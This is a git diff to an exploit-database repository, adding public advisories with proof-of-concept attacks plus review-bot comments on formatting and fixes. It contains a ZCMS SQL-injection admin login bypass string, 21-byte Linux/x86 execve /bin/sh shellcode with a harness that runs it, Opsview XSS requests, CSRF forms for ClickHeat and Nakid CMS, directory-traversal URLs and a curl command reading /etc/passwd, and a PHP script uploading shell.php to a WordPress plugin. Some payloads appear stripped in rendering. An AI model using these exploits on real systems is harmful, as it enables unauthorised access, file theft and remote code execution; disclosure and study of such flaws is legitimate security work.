diff --git a/files.csv b/files.csv
index ff38429ba..be9c06f98 100755
--- a/files.csv
+++ b/files.csv
@@ -33612,7 +33612,8 @@ id,file,description,date,author,platform,type,port
 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
-37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
+37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
+37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
@@ -33621,6 +33622,7 @@ id,file,description,date,author,platform,type,port
 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
+37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
 37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
@@ -33633,3 +33635,8 @@ id,file,description,date,author,platform,type,port
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
+37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
+37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
+37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
+37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
diff --git a/platforms/jsp/webapps/37272.txt b/platforms/jsp/webapps/37272.txt
new file mode 100755
index 000000000..04f56434a
--- /dev/null
+++ b/platforms/jsp/webapps/37272.txt
@@ -0,0 +1,137 @@ +# Exploit Title: SQL Injection & Persistent XSS +# Google Dork: intitle: SQL Injection & Persistent XSS +# Date: 2015-06-12 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: zencherry.com +# Software Link: sourceforge.net/projects/zencherrycms +# Version: 1.1 +# Tested on: windows 7 on Apache Tomcat +# Category: webapps + + +Vendor: +============================================= +http://zencherry.com/ +http://sourceforge.net/projects/zencherrycms + + + +Product: +================================================== +ZCMS 1.1 JavaServer Pages Content Management System + + + +Advisory Information: +============================== +SQL Injection & Persistent XSS + + + +Vulnerability Details: +====================== +SQL Injection: +Login to admin area requires a password but is easily bypassed +using classic SQLInjection method because application uses +concatenated user input to construct SQL queries. + + +ZCMS exploitable admin login code: +================================== +squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users +WHERE +status = 0 AND username = '"+username+"' AND password = +'"+request.getParameter("pass") +"' AND type = 1 ;"; + + +So we just supply an Admin password like ---> HELL' OR '2'='2 +which will resolve as true! + + +SQL Inject XSS Payload: +======================= +We can also inject persisten XSS payload directly to MySQL database +subverting +all character filtering leveraging existing SQLInjection vulnerabilities. 
+ + +Persistent XSS: +=============== + +Another persistent XSS vector is here in author field for comments: +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page +number] + + +Exploit code(s): +=============== + +1) Bypass admin login +--------------------- +localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login +Enter 'admin' for username field +Enter HELL' OR '2'='2 for the pass field + + +2) Inject XSS using SQL Injection +--------------------------------- +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title= +" +&content=&author= +SATAN&visibility=1&type=1&comm=0 + + +3) Persistent XSS field +----------------------- +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page +number] +Inject in author input field. + + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +June 12, 2015 : Public Disclosure + + + +Severity Level: +========================================================= +High + + + +Description: +========================================================== + +Request Method(s): [+] GET & POST + + +Vulnerable Product: [+] ZCMS_1.1 + + +Vulnerable Parameter(s): [+] pass, title, content, author + + +Affected Area(s): [+] Admin, CMS + + +=============================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that +it is not altered except by reformatting it, and that due credit is given. +Permission is +explicitly given for insertion in vulnerability databases and similar, +provided that +due credit is given to the author. The author is not responsible for any +misuse of the +information contained herein and prohibits any malicious use of all +security related +information or exploits by the author or elsewhere. + + +(hyp3rlinx) diff --git a/platforms/lin_x86/shellcode/37251.asm b/platforms/lin_x86/shellcode/37251.asm new file mode 100755 index 000000000..eaeadfac3 
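Review bot: The `# Exploit Title:` and `# Google Dork:` headers of 37272.txt name no product: the title is just `SQL Injection & Persistent XSS` and the dork `intitle: SQL Injection & Persistent XSS` is not a usable query, while the files.csv row calls the entry `ZCMS 1.1 - Multiple Vulnerabilities`; the same pattern is in platforms/php/webapps/37270.txt (`CSRF, Persistent XSS & LFI`). Suggest `# Exploit Title: ZCMS 1.1 - SQL Injection & Persistent XSS` and either a real dork or no dork line. The quoted login code concatenates `username` and `request.getParameter("pass")` straight into the query, so a short remediation line would make the advisory actionable for defenders, e.g. `Fix: bind both values via PreparedStatement parameters and compare against a salted password hash instead of the cleartext column`. Also `persisten XSS payload` should read `persistent`, and the payload body under "SQL Inject XSS Payload" is empty in this rendering — presumably stripped as markup, worth confirming against the committed file.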
--- /dev/null +++ b/platforms/lin_x86/shellcode/37251.asm @@ -0,0 +1,29 @@ +Linux/x86 execve /bin/sh shellcode 21 bytes + + +#Greetz : KnocKout,curtis,Bomberman(Leader) +#Author : B3mB4m + +Disassembly of section .text: + +08048060 <.text>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 2f 2f 73 68 push $0x68732f2f + 8048068: 68 2f 62 69 6e push $0x6e69622f + 804806d: 89 e3 mov %esp,%ebx + 804806f: 89 c2 mov %eax,%edx + 8048071: b0 0b mov $0xb,%al + 8048073: cd 80 int $0x80 + + +#include +#include + +char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80"; + +int main(void){ + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)();} + +# Length: 21 PWNED ! \ No newline at end of file diff --git a/platforms/linux/local/120.c b/platforms/linux/local/120.c index 2887000c4..06728aeb6 100755 --- a/platforms/linux/local/120.c +++ b/platforms/linux/local/120.c @@ -59,7 +59,7 @@ #define PATH "/usr/local/bin/terminatorX" #define RET 0xbffff69e -char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" +char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char *buffer,*ptr; @@ -234,6 +234,6 @@ main(int argc,char *argv[]) return 0; } - - -// milw0rm.com [2003-11-13] + + +// milw0rm.com [2003-11-13] diff --git a/platforms/multiple/webapps/37271.txt b/platforms/multiple/webapps/37271.txt new file mode 100755 index 000000000..54fda0f5a --- /dev/null +++ b/platforms/multiple/webapps/37271.txt 
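Review bot: The C harness at the end of 37251.asm prints `strlen(shellcode)` with `%d`, but `strlen` returns `size_t`, so the line should be `fprintf(stdout,"Length: %zu\n",strlen(shellcode));`. The two `#include` directives carry no header name here — presumably `<stdio.h>` and `<string.h>` were lost in rendering, since `fprintf` and `strlen` depend on them; worth confirming the committed file has them. The file mixes objdump output, a C program and prose under a `.asm` name, so a leading comment stating that the listing is objdump output and the C block is a length/test harness would help readers.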
@@ -0,0 +1,68 @@ +# Exploit title: Opsview 4.6.2 - Multiple XSS +# Date: 07-06-2015 +# Vendor homepage: www.opsview.com +# Version: 4.6.2 +# CVE: CVE-2015-4420 +# Author: Dolev Farhi @dolevf +# Tested On: Kali Linux + Windows 7 + +# Details: +# -------- +# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version + + + +1. Stored XSS through a malicious check plugin + +a. Create a plugin with the following content: + +#!/bin/bash +echo '' +exit 2 + +b. create a new check and assign this plugin. + +c. once a host uses this check, navigate to the event page, the XSS will be injected. + +d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement. + + + +2. Stored XSS in host profile + +a. add a host + +b. in the description of the host, add a description as the one below: + + +c. save settings + +d. once a user/admin views the host settings, XSS will be injected. + + +3. Reflected XSS in Test service check page. +a. Add a new service check + +b. Test the new service check against any host and provide in the command line the following + +c. the XSS will immediately reflect to the screen. + +response output: + +POST /state/service/166/exec HTTP/1.1 +Host: 192.168.0.20 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview +Content-Length: 105 +Cookie: PHPSESSID= +auth_tkt= +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915 \ No newline at end of file 
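Review bot: The payloads in steps 1a, 2b and 3b of 37271.txt are empty in this rendering, so the reproduction steps cannot be followed as written; presumably the `<script>` lines were dropped as markup, and the advisory would survive rendering better if it stated them URL-encoded or escaped, as the captured request body already does (`plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E`). The reflected parameter, `plugin_args` on `POST /state/service/166/exec`, is only visible inside the capture and should be named in the text, as should the affected fields for the two stored cases (check-plugin output and host description). `# Date: 07-06-2015` is day-first while the other new advisories use ISO dates; `# Date: 2015-06-07` would be unambiguous. The `_CSRFToken=` value is printed verbatim while `PHPSESSID=` and `auth_tkt=` were blanked; either redact it the same way or state that it is a lab sample.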
diff --git a/platforms/php/webapps/37248.txt b/platforms/php/webapps/37248.txt index 9e2ede231..8203a1725 100755 --- a/platforms/php/webapps/37248.txt +++ b/platforms/php/webapps/37248.txt @@ -103,13 +103,3 @@ ___________    ____   ____ _____  |  | __ ___________ |   __(____  /___|  /\___  >____  /__|_ \\___  >__| |__|       \/     \/     \/     \/     \/    \/ .........................cant be pr0 without ascii art - - - Den tisdag, 9 juni 2015 8:17 skrev john smith : - - - sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137 - - - - \ No newline at end of file diff --git a/platforms/php/webapps/37266.txt b/platforms/php/webapps/37266.txt new file mode 100755 index 000000000..09e076a22 --- /dev/null +++ b/platforms/php/webapps/37266.txt @@ -0,0 +1,51 @@ +# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF +# Google Dork: allinurl:/clickheat/ +# Date: 11-06-2015 +# Exploit Author: David Shanahan (@CyberpunkSec) +# Contact: https://twitter.com/CyberpunkSec +# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html +# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/ +# Version: 1.14 +# Tested on: Windows + +---- Description ---- + +ClickHeat is vulnerable to a CSRF attack because it does not implement a +CSRF token when updating the config file. If an authenticated admin is +tricked into opening this malicious URL, the form will be submitted which +changes the administrator password to the one the attacker has specified. + +---- CSRF PoC ---- + +Set the value of "adminLogin" to the administrators username, then set the +value of "adminPass" to a md5 hash of the password you want. (you may also +need to change the "logPath" & "cachePath") + +/* CODE */ + + + +
+ +
+ +/* CODE */ + +---- Solution ---- + +The ClickHeat project seems to be dead, as it has not been updated since +late 2011. Due to this, I truly doubt a patch will be issued so I would +recommend removing this product from your website. diff --git a/platforms/php/webapps/37270.txt b/platforms/php/webapps/37270.txt new file mode 100755 index 000000000..91c6e1148 --- /dev/null +++ b/platforms/php/webapps/37270.txt 
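Review bot: The version identifiers in 37266.txt disagree: the title says `ClickHeat <1.1.4`, the header says `# Version: 1.14`, and the files.csv row says `ClickHeat <= 1.14`; check the project's release naming and use one form throughout, e.g. `# Exploit Title: ClickHeat <= 1.14 Change Admin Password CSRF`. The PoC between the two `/* CODE */` markers is empty here — presumably the HTML form was stripped as markup — so the committed file should be checked to actually contain it. The Solution section only recommends removal; it would help defenders to also name the generic mitigation the text implies, a per-session anti-CSRF token validated by the config-update handler, since the description states that no such token exists.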
@@ -0,0 +1,284 @@ +# Exploit Title: CSRF, Persistent XSS & LFI +# Google Dork: intitle: CSRF, Persistent XSS & LFI +# Date: 2015-06-11 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: kilrizzy.github.io/Nakid-CMS +# Software Link: kilrizzy.github.io/Nakid-CMS +# Version: kilrizzy-Nakid-CMS-f274624 +# Tested on: windows 7 on XAMPP +# Category: webapps + + +Vendor: +================================ +http://kilrizzy.github.io/Nakid-CMS/ + + + +Product: +================================ +kilrizzy-Nakid-CMS-f274624 +Nakid CMS is an open source content management system built using PHP and +CodeIgniter. + + +Setup mode: +========== +Under root dir for Nakid CMS we set to production mode instead of +development in index.php. +e.g. define('ENVIRONMENT', 'production'); + + + +Advisory Information: +================================================ +CSRF, Persistent XSS & Auth bypass LFI + + + +Vulnerability Details: +===================== +Multiple CSRF(s) exist: + +We have ability to do the following as no CSRF tokens are present. + +1-Change Admin password +2-Add arbitrary users to system +3-Alter system settings + + + +XSS (persistent): +XSS parameter vulnerabilities exist for the following: +payloads will be stored in the MySQL database and activated when a victim +visits the vulnerable webpage. + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users +On the "Edit Record" pop up dialog box. + + +Vulnerable parameters: +--------------------- +username +password +email +fname +lname + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings +On the "Edit Record" pop up dialog box. 
+ + +Vulnerable parameters: +--------------------- +from_name +include_path +primary_email +from_email + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1 + +Vulnerable parameter: +-------------------- +title + + +Authentication bypass LFI: +Local file inclusion to bypass access controls and read aribitrary files +exist by setting '$url' PHP variable on following URL + +index.php/connector$url + + + +Exploit POC code(s): +==================== + +CSRF(s): +======== + +Condition: +Pursuade victim to visit our webpage or click our link, if they have a +session then we do our CSRF!. + + +1- Add arbitrary user to system +-------------------------------- + + + + + + + +
+ + + + + + + +
+ + + + +2-Change Admin password +------------------------ + + + + + + + +
+ + + + + + + +
+ + + + +3-Alter system settings +----------------------- + + + + + + + +
+ + + +
+ + + + +XSS persistent POC code: +======================= + +Inject into any of the following vulnerable +fields described above using POST method. +Need to highlight a row then click edit dialog box to edit settings. + +e.g. + +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings + +from_name <------- +include_path +primary_email +from_email + + +Authorization bypass LFI: +======================== + +1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web +root, then visit the URL (change to suit your environment). + +2- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt + +OR try + +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php + + + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +June 11, 2015 : Public Disclosure + + + + +Severity Level: +========================================================= +High + + + +Description: +========================================================== + +Request Method(s): [+] GET & POST + + +Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624 + + +Vulnerable Parameter(s): [+] + username + password + email + fname + lname + from_name + include_path + primary_email + from_email + title + connector$url + + +Affected Area(s): [+] /system/users + /system/profile + /system/content_edit/ + +=============================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. 
The author is not responsible for any misuse of the information +contained herein and prohibits any malicious use of all security related +information or exploits by the author or elsewhere. + + +(hyp3rlinx) diff --git a/platforms/php/webapps/37274.txt b/platforms/php/webapps/37274.txt new file mode 100755 index 000000000..182fbf694 --- /dev/null +++ b/platforms/php/webapps/37274.txt 
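Review bot: The LFI section of 37270.txt is headed `Authentication bypass LFI` under Vulnerability Details and `Authorization bypass LFI` under the PoC, and the sentence `setting '$url' PHP variable on following URL index.php/connector$url` does not say what `connector$url` is; from the PoC it is a path segment of the form `connector$url=<relative path>`, and the text should state that plainly so the vendor can locate the missing access check. The generic `# Exploit Title` / `# Google Dork` header issue raised on 37272.txt applies here as well. The three CSRF PoC forms are empty in this rendering, presumably stripped as HTML, which should be verified in the committed file. Typos: `aribitrary` → `arbitrary`, `Pursuade` → `Persuade`.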
@@ -0,0 +1,53 @@ +Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 +Author: Larry W. Cashdollar, @_larry0 +Date: 2015-06-06 +Advisory: http://www.vapid.dhs.org/advisory.php?v=124 +Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/ +Vendor: https://profiles.wordpress.org/sedevelops/ +Vendor Notified: 2015-06-06 +Vendor Contact: https://profiles.wordpress.org/sedevelops/ +Description: +An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post. + +Vulnerability: +The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../. + +This vulnerability doesn’t require authentication to the Wordpress site. + +File ./se-html5-album-audio-player/download_audio.php: + +3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file']; +4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/'); +5 // make sure it's a file before doing anything! +6 if( is_file($file_name) && $is_in_uploads_dir !== false ) { +7 +8 // required for IE +9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); } +10 +11 // get the file mime type using the file extension +12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) { +13 case 'pdf': $mime = 'application/pdf'; break; +14 case 'zip': $mime = 'application/zip'; break; +15 case 'jpeg': +16 case 'jpg': $mime = 'image/jpg'; break; +17 default: $mime = 'application/force-download'; +18 } +19 header('Pragma: public'); // required +20 header('Expires: 0'); // no cache +21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); +22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' 
GMT'); +23 header('Cache-Control: private',false); +24 header('Content-Type: '.$mime); +25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); +26 header('Content-Transfer-Encoding: binary'); +27 header('Content-Length: '.filesize($file_name)); // provide file size +28 header('Connection: close'); +29 readfile($file_name); // push it out +30 exit(); + +The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory. + +CVEID: 2015-4414 +OSVDB: +Exploit Code: + • $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37275.txt b/platforms/php/webapps/37275.txt new file mode 100755 index 000000000..e926d6fcd --- /dev/null +++ b/platforms/php/webapps/37275.txt 
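Review bot: `CVEID: 2015-4414` in 37274.txt lacks the `CVE-` prefix (37275.txt has the same with `CVEID: 2015-4455`) and `OSVDB:` is left empty; write `CVEID: CVE-2015-4414` and drop or fill the blank field. The advisory has no remediation section although the root cause is fully quoted: line 4's `strpos($file_name, '/wp-content/uploads/')` accepts any path that merely contains that substring, and nothing in lines 3–30 checks that the requester is logged in, as the text itself notes. A defender-facing fix is to canonicalise before comparing, e.g. `$base = realpath($_SERVER['DOCUMENT_ROOT'] . '/wp-content/uploads');` `$real = realpath($_SERVER['DOCUMENT_ROOT'] . $_GET['file']);` `if ($real === false || strpos($real, $base . '/') !== 0) { exit; }`, plus an authentication or capability check if downloads are not meant to be public.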
@@ -0,0 +1,87 @@ +Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin +Author: Larry W. Cashdollar, @_larry0 +Date: 2015-06-07 +Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms +Vendor: Waters Edge Web Design and NetherWorks LLC +Vendor Notified: 2015-06-08 +Advisory: http://www.vapid.dhs.org/advisory.php?v=125 +Vendor Contact: plugins@wordpress.org +Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. +Vulnerability: +There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. + +In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: + +1 $max_file_size ){ +15 $msg = "File Size is too big."; +16 $error_flag = true; +17 } +18 $extension = strtolower(end(explode('.', $image_file['name']))); +19 $aa_options = get_option('gf_aa_options'); +20 $supported_files = $aa_options['supported_file_format']; +21 $supported_files = strtolower($supported_files); +22 if(!$error_flag && $supported_files != '' ){ +23 $supported_files = explode (',', $supported_files); +24 if(!in_array($extension, $supported_files)){ +25 $msg = "No Supported file."; +26 $error_flag = true; +27 } +28 } +29 if(!$error_flag){ +30 $wp_upload_dir = wp_upload_dir(); +31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ +32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); +33 } +34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; +35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; +36 $file_name = 
$upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ]; +37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ +38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me']; +39 } +40 } +41 $return_obj = array('status' => 'success', 'message' => $file_url); +42 echo json_encode($return_obj); +43 } +44 ?> + +CVEID: 2015-4455 +OSVDB: +Exploit Code: + 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path); + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL,$target_url); + curl_setopt($ch, CURLOPT_POST,1); + curl_setopt($ch, CURLOPT_POSTFIELDS, $post); + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + $result=curl_exec ($ch); + curl_close ($ch); + echo "
"; + echo $result; + echo "
"; +?>
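Review bot: The quoted upload.php listing in 37275.txt starts at `1 $max_file_size ){`, so lines 1–14 (the `<?php` opener and the `$image_file`/`$max_file_size` setup) are missing here, presumably lost as markup; the committed file should be checked, since the "no authentication check" claim rests on exactly those lines. The description could also state what the quoted lines 22–28 show: the extension allowlist runs only when `supported_file_format` is non-empty, so a fix needs both a capability/nonce check at the top of upload.php and a mandatory server-side allowlist rather than an opt-in one. `CVEID: 2015-4455` has the same missing `CVE-` prefix noted on 37274.txt.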